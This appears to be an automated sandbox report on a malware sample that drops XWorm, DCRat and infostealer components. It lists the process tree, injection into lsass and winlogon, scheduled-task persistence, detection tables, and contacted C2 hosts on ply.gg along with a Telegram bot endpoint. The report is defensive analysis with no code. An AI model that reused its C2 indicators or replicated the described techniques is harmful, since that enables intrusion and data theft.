                        Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                        Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                        Hidden Files and Directories
                        KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                        Behavior Graph ID: 1539526
                        Sample: aoKTzGQSRP.exe
                        Start date: 22/10/2024
                        Architecture: WINDOWS
                        Score: 100

                        DNS/IP info attached to the start node: subscribe-bond.gl.at.ply.gg; ip-api.com; dashboard.botghost.com
                        Signatures attached to the start node: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 32 other signatures

                        Process tree as drawn in the behavior graph (the counters after a process name are the graph's own badges; the graph legend lists "Number of created Registry Values" and "Number of created Files"):

                        • aoKTzGQSRP.exe 3 (started)
                          • Dropped: C:\Users\user\AppData\...\CMaker 2.0.exe, PE32+; C:\Users\user\AppData\Local\Temp\1.exe, PE32
                          • 1.exe 5 (started)
                            • Dropped: C:\Users\Public\DeadXClient.exe, PE32; C:\Users\Public\DeadROOTkit.exe, PE32; C:\Users\Public\DeadCodeRootKit.exe, PE32
                            • Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; 2 other signatures
                            • DeadXClient.exe 1 5 (started)
                              • DNS/IP: subscribe-bond.gl.at.ply.gg 147.185.221.21, 28600, 49766, 49817 SALSGIVERUS United States
                              • Dropped: C:\Users\Public\Deadsvchost.exe, PE32
                              • Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); 2 other signatures
                              • schtasks.exe (started)
                                • conhost.exe (started)
                            • DeadROOTkit.exe 14 2 (started)
                              • DNS/IP: ip-api.com 208.95.112.1, 49729, 80 TUT-ASUS United States
                              • Signatures: Machine Learning detection for dropped file; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                              • WerFault.exe (started)
                            • DeadCodeRootKit.exe 1 (started)
                          • CMaker 2.0.exe 40 (started)
                            • Dropped: C:\Users\user\AppData\...\unicodedata.pyd, PE32+; C:\Users\user\AppData\Local\...\select.pyd, PE32+; C:\Users\user\AppData\Local\...\python311.dll, PE32+; 17 other files (16 malicious)
                            • CMaker 2.0.exe 1 (started)
                              • DNS/IP: dashboard.botghost.com 188.114.97.3, 443, 49713 CLOUDFLARENETUS European Union
                            • conhost.exe (started)
                        • powershell.exe (started)
                          • Signatures: Writes to foreign memory regions; Modifies the context of a thread in another process (thread injection); Found suspicious powershell code related to unpacking or dynamic code loading; Injects a PE file into a foreign processes
                          • dllhost.exe (started)
                            • Signatures: Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; Creates a thread in another existing process (thread injection); Injects a PE file into a foreign processes
                            • Injected into: winlogon.exe; lsass.exe; svchost.exe; 20 other processes
                          • conhost.exe (started)
                        • Deadsvchost.exe (started)
                          • Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
                        • 3 other processes
                          • WerFault.exe (started)

                        Source | Detection | Scanner | Label | Link
                        aoKTzGQSRP.exe | 76% | ReversingLabs | Win32.Dropper.Dapato |
                        aoKTzGQSRP.exe | 100% | Avira | TR/Dropper.Gen |
                        aoKTzGQSRP.exe | 100% | Joe Sandbox ML | |

                        Source | Detection | Scanner | Label | Link
                        C:\Users\Public\DeadROOTkit.exe | 100% | Avira | TR/Spy.Gen |
                        C:\Users\user\AppData\Local\Temp\1.exe | 100% | Avira | TR/Dropper.Gen2 |
                        C:\Users\Public\DeadCodeRootKit.exe | 100% | Avira | TR/Dropper.MSIL.Gen |
                        C:\Users\Public\Deadsvchost.exe | 100% | Avira | HEUR/AGEN.1305769 |
                        C:\Users\Public\DeadXClient.exe | 100% | Avira | HEUR/AGEN.1305769 |
                        C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe | 100% | Avira | TR/Redcap.xbbft |
                        C:\Users\Public\DeadROOTkit.exe | 100% | Joe Sandbox ML | |
                        C:\Users\user\AppData\Local\Temp\1.exe | 100% | Joe Sandbox ML | |
                        C:\Users\Public\DeadCodeRootKit.exe | 100% | Joe Sandbox ML | |
                        C:\Users\Public\Deadsvchost.exe | 100% | Joe Sandbox ML | |
                        C:\Users\Public\DeadXClient.exe | 100% | Joe Sandbox ML | |
                        C:\Users\Public\DeadCodeRootKit.exe | 92% | ReversingLabs | ByteCode-MSIL.Infostealer.Tinba |
                        C:\Users\Public\DeadROOTkit.exe | 81% | ReversingLabs | ByteCode-MSIL.Backdoor.XWorm |
                        C:\Users\Public\DeadXClient.exe | 87% | ReversingLabs | ByteCode-MSIL.Backdoor.XWorm |
                        C:\Users\Public\Deadsvchost.exe | 87% | ReversingLabs | ByteCode-MSIL.Backdoor.XWorm |
                        C:\Users\user\AppData\Local\Temp\1.exe | 74% | ReversingLabs | ByteCode-MSIL.Trojan.IPCheckDCRat |
                        C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe | 34% | ReversingLabs | Win64.Trojan.Cerbu |
                        C:\Users\user\AppData\Local\Temp\_MEI48002\VCRUNTIME140.dll | 0% | ReversingLabs | |
                        C:\Users\user\AppData\Local\Temp\_MEI48002\_bz2.pyd | 0% | ReversingLabs | |
                        C:\Users\user\AppData\Local\Temp\_MEI48002\_cffi_backend.cp311-win_amd64.pyd | 0% | ReversingLabs | |
                        C:\Users\user\AppData\Local\Temp\_MEI48002\_ctypes.pyd | 0% | ReversingLabs | |
                        C:\Users\user\AppData\Local\Temp\_MEI48002\_decimal.pyd | 0% | ReversingLabs | |
                        C:\Users\user\AppData\Local\Temp\_MEI48002\_hashlib.pyd | 0% | ReversingLabs | |
                        C:\Users\user\AppData\Local\Temp\_MEI48002\_lzma.pyd | 0% | ReversingLabs | |
                        C:\Users\user\AppData\Local\Temp\_MEI48002\_queue.pyd | 0% | ReversingLabs | |
                        C:\Users\user\AppData\Local\Temp\_MEI48002\_socket.pyd | 0% | ReversingLabs | |
                        C:\Users\user\AppData\Local\Temp\_MEI48002\_ssl.pyd | 0% | ReversingLabs | |
                        C:\Users\user\AppData\Local\Temp\_MEI48002\charset_normalizer\md.cp311-win_amd64.pyd | 0% | ReversingLabs | |
                        C:\Users\user\AppData\Local\Temp\_MEI48002\charset_normalizer\md__mypyc.cp311-win_amd64.pyd | 0% | ReversingLabs | |
                        C:\Users\user\AppData\Local\Temp\_MEI48002\cryptography\hazmat\bindings\_rust.pyd | 0% | ReversingLabs | |
                        C:\Users\user\AppData\Local\Temp\_MEI48002\libcrypto-3.dll | 0% | ReversingLabs | |
                        C:\Users\user\AppData\Local\Temp\_MEI48002\libffi-8.dll | 0% | ReversingLabs | |
                        C:\Users\user\AppData\Local\Temp\_MEI48002\libssl-3.dll | 0% | ReversingLabs | |
                        C:\Users\user\AppData\Local\Temp\_MEI48002\python3.dll | 0% | ReversingLabs | |
                        C:\Users\user\AppData\Local\Temp\_MEI48002\python311.dll | 0% | ReversingLabs | |
                        C:\Users\user\AppData\Local\Temp\_MEI48002\select.pyd | 0% | ReversingLabs | |
                        C:\Users\user\AppData\Local\Temp\_MEI48002\unicodedata.pyd | 4% | ReversingLabs | |
                        No Antivirus matches
                        No Antivirus matches
                        Source | Detection | Scanner | Label | Link
                        https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
                        http://ip-api.com | 0% | URL Reputation | safe |
                        http://crl.dhimyotis.com/certignarootca.crl | 0% | URL Reputation | safe |
                        http://curl.haxx.se/rfc/cookie_spec.html | 0% | URL Reputation | safe |
                        http://ocsp.accv.es | 0% | URL Reputation | safe |
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
                        https://httpbin.org/get | 0% | URL Reputation | safe |
                        http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
                        https://go.micro | 0% | URL Reputation | safe |
                        https://wwww.certigna.fr/autorites/0m | 0% | URL Reputation | safe |
                        https://contoso.com/Icon | 0% | URL Reputation | safe |
                        https://httpbin.org/ | 0% | URL Reputation | safe |
                        http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535 | 0% | URL Reputation | safe |
                        http://crl.securetrust.com/STCA.crl | 0% | URL Reputation | safe |
                        http://wwwsearch.sf.net/): | 0% | URL Reputation | safe |
                        http://schemas.xmlsoap.org/wsdl/ | 0% | URL Reputation | safe |
                        http://www.accv.es00 | 0% | URL Reputation | safe |
                        http://crl.securetrust.com/SGCA.crl | 0% | URL Reputation | safe |
                        https://httpbin.org/post | 0% | URL Reputation | safe |
                        https://contoso.com/License | 0% | URL Reputation | safe |
                        http://www.firmaprofesional.com/cps0 | 0% | URL Reputation | safe |
                        http://schemas.xmlsoap.org/ws/2005/02/trust | 0% | URL Reputation | safe |
                        http://crl.securetrust.com/SGCA.crl0 | 0% | URL Reputation | safe |
                        http://crl.securetrust.com/STCA.crl0 | 0% | URL Reputation | safe |
                        http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6 | 0% | URL Reputation | safe |
                        http://www.quovadisglobal.com/cps0 | 0% | URL Reputation | safe |
                        https://contoso.com/ | 0% | URL Reputation | safe |
                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd | 0% | URL Reputation | safe |
                        http://repository.swisssign.com/ | 0% | URL Reputation | safe |
                        http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
                        Name | IP | Active | Malicious | Antivirus Detection | Reputation
                        dashboard.botghost.com | 188.114.97.3 | true | false | | unknown
                        subscribe-bond.gl.at.ply.gg | 147.185.221.21 | true | true | | unknown
                        ip-api.com | 208.95.112.1 | true | true | | unknown

                        Name | Malicious | Antivirus Detection | Reputation
                        updates-full.gl.at.ply.gg | true | | unknown
                        Name | Source | Malicious | Antivirus Detection | Reputation
                        http://schemas.xmlsoap.org/wsdl/erties | lsass.exe, 00000014.00000000.2323081160.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3471000801.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
                        https://api.telegram.org/bot | 1.exe, 00000004.00000002.2208653873.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, DeadROOTkit.exe, 00000007.00000000.2203959868.0000000000DD2000.00000002.00000001.01000000.0000001B.sdmp | false | | unknown
                        https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py# | CMaker 2.0.exe, 00000005.00000003.2231837202.0000022D32CFB000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2231595262.0000022D32CDB000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2166652116.0000022D34A41000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2229517767.0000022D32CAD000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2256023136.0000022D32D03000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2168838865.0000022D32CDD000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2231466391.0000022D32CBE000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2228604292.0000022D32CA8000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2168404462.0000022D32CF5000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2230940040.0000022D32CBB000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                        https://github.com/pyca/cryptography/actions?query=workflow%3ACI | CMaker 2.0.exe, 00000002.00000003.2156737059.00000218C0180000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                        https://tools.ietf.org/html/rfc2388#section-4.4 | CMaker 2.0.exe, 00000005.00000003.2239700913.0000022D34AAD000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2234513191.0000022D34AA1000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2239428918.0000022D34AAC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2232148885.0000022D34A94000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2239829401.0000022D34AAF000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                        https://www.apache.org/licenses/LICENSE-2.0 | CMaker 2.0.exe, 00000002.00000003.2156350024.00000218C018E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2156227950.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2156227950.00000218C018E000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                        https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64 | CMaker 2.0.exe, 00000005.00000003.2172273654.0000022D34DCB000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2231869727.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2171930276.0000022D34DCB000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2172905632.0000022D34DCB000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2222507577.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2257514118.0000022D34DEC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2177316292.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2176753865.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2175839153.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2229086639.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2243720980.0000022D34DE4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2243030617.0000022D34DCA000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2232613398.0000022D34DBE000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2237820216.0000022D34DC3000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2232547754.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2226687778.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                        https://requests.readthedocs.ioP | CMaker 2.0.exe, 00000005.00000002.2260232738.0000022D3568C000.00000004.00001000.00020000.00000000.sdmp | false | | unknown
                        https://nuget.org/nuget.exe | powershell.exe, 00000009.00000002.2359290982.000001DE7469F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                        http://ip-api.com | DeadROOTkit.exe, 00000007.00000002.2316235027.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, DeadROOTkit.exe, 00000007.00000002.2316235027.00000000030E8000.00000004.00000800.00020000.00000000.sdmp, DeadROOTkit.exe, 00000007.00000002.2316235027.00000000030DA000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                        https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963 | CMaker 2.0.exe, 00000005.00000003.2176043917.0000022D34D3E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2175447442.0000022D34D3E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2257904597.0000022D34F40000.00000004.00001000.00020000.00000000.sdmp | false | | unknown
                        http://cacerts.digi | CMaker 2.0.exe, 00000002.00000003.2158096042.00000218C0180000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                        https://peps.python.org/pep-0205/ | CMaker 2.0.exe, 00000005.00000002.2256796014.0000022D34B40000.00000004.00001000.00020000.00000000.sdmp | false | | unknown
                        http://crl.dhimyotis.com/certignarootca.crl | CMaker 2.0.exe, 00000005.00000003.2226979229.0000022D3531E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                        http://curl.haxx.se/rfc/cookie_spec.html | CMaker 2.0.exe, 00000005.00000003.2177316292.0000022D34CFC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2259985977.0000022D35440000.00000004.00001000.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                        http://ocsp.accv.es | CMaker 2.0.exe, 00000005.00000003.2229209676.0000022D34CA0000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2238078413.0000022D34CD1000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2234701009.0000022D34CD0000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2230284618.0000022D34CA1000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2244950158.0000022D34CD1000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2257114555.0000022D34CD1000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2228810788.0000022D34C9B000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | DeadXClient.exe, 00000006.00000002.3473575665.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, DeadROOTkit.exe, 00000007.00000002.2316235027.00000000030DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2322203406.000001DE64631000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                        https://rentry.co | CMaker 2.0.exe, 00000005.00000002.2256796014.0000022D34B40000.00000004.00001000.00020000.00000000.sdmp | false | | unknown
                        https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy | CMaker 2.0.exe, 00000005.00000003.2175447442.0000022D34C9B000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2260123822.0000022D35540000.00000004.00001000.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2175447442.0000022D34CFC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2177316292.0000022D34CDD000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                        https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688 | CMaker 2.0.exe, 00000005.00000003.2166652116.0000022D34A41000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2256074496.0000022D34688000.00000004.00001000.00020000.00000000.sdmp | false | | unknown
                        https://httpbin.org/get | CMaker 2.0.exe, 00000005.00000003.2225582122.0000022D351CE000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2228425828.0000022D35248000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2226687778.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                        http://crl.xrampsecurity.com/XGCA.crlH | CMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2226910448.0000022D352A9000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2227278021.0000022D352AA000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                        http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702 | lsass.exe, 00000014.00000000.2323081160.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3471000801.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
                        http://pesterbdd.com/images/Pester.png | powershell.exe, 00000009.00000002.2322203406.000001DE6485D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                        http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000009.00000002.2322203406.000001DE6485D000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
                        https://go.micro | powershell.exe, 00000009.00000002.2322203406.000001DE65B61000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                        https://wwww.certigna.fr/autorites/0m | CMaker 2.0.exe, 00000005.00000003.2226376831.0000022D352E3000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2227665818.0000022D3531F000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225808722.0000022D352C9000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2226979229.0000022D3531E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                        https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader | CMaker 2.0.exe, 00000005.00000003.2231837202.0000022D32CFB000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2231595262.0000022D32CDB000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2166652116.0000022D34A41000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2229517767.0000022D32CAD000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2256023136.0000022D32D03000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2168838865.0000022D32CDD000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2231466391.0000022D32CBE000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2228604292.0000022D32CA8000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2168404462.0000022D32CF5000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2230940040.0000022D32CBB000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                        https://github.com/python/cpython/issues/86361. | CMaker 2.0.exe, 00000005.00000003.2170943791.0000022D34AD9000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2170622659.0000022D34D5E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2246985261.0000022D34AC2000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2172194945.0000022D34A94000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2256607534.0000022D34AC2000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2236343248.0000022D34ABF000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2234194053.0000022D34AB7000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225465109.0000022D34AB6000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                        https://contoso.com/Icon | powershell.exe, 00000009.00000002.2359290982.000001DE7469F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                        https://httpbin.org/ | CMaker 2.0.exe, 00000005.00000003.2228810788.0000022D34C9B000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                        https://www.apache.org/licenses/ | CMaker 2.0.exe, 00000002.00000003.2156227950.00000218C0180000.00000004.00000020.00020000.00000000.sdmp | false | |
                                                                        unknown
                                                                        https://github.com/pyca/cryptography/workflows/CI/badge.svg?branch=mainCMaker 2.0.exe, 00000002.00000003.2156737059.00000218C0180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          https://wwww.certigna.fr/autorites/CMaker 2.0.exe, 00000005.00000003.2226376831.0000022D352E3000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225808722.0000022D352C9000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2228360030.0000022D35308000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2227580018.0000022D352F0000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2227398633.0000022D352E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            http://www.cl.cam.ac.uk/~mgk25/iso-time.htmlCMaker 2.0.exe, 00000005.00000003.2172704229.0000022D34E09000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2172153148.0000022D34E04000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2171930276.0000022D34CDD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              https://dashboard.botghost.com/api/public/tools/user_lookup/10773009346920490670YCMaker 2.0.exe, 00000005.00000002.2256204504.0000022D34840000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                https://github.com/Pester/Pesterpowershell.exe, 00000009.00000002.2322203406.000001DE6485D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535CMaker 2.0.exe, 00000005.00000003.2231869727.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2241810301.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2248531599.0000022D34DB5000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2222507577.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2177316292.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2176753865.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2175839153.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2232649259.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2229086639.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2240132556.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2232613398.0000022D34DBE000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2233299609.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2232547754.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2226687778.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://cryptography.io/en/latest/installation/CMaker 2.0.exe, 00000002.00000003.2156737059.00000218C0180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_syCMaker 2.0.exe, 00000005.00000003.2231837202.0000022D32CFB000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2231595262.0000022D32CDB000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2166652116.0000022D34A41000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2229517767.0000022D32CAD000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2256023136.0000022D32D03000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2168838865.0000022D32CDD000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2231466391.0000022D32CBE000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2228604292.0000022D32CA8000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2168404462.0000022D32CF5000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2230940040.0000022D32CBB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      https://www.python.org/psf/license/CMaker 2.0.exe, CMaker 2.0.exe, 00000005.00000002.2262592946.00007FFD8FBD8000.00000040.00000001.01000000.00000009.sdmpfalse
                                                                                        unknown
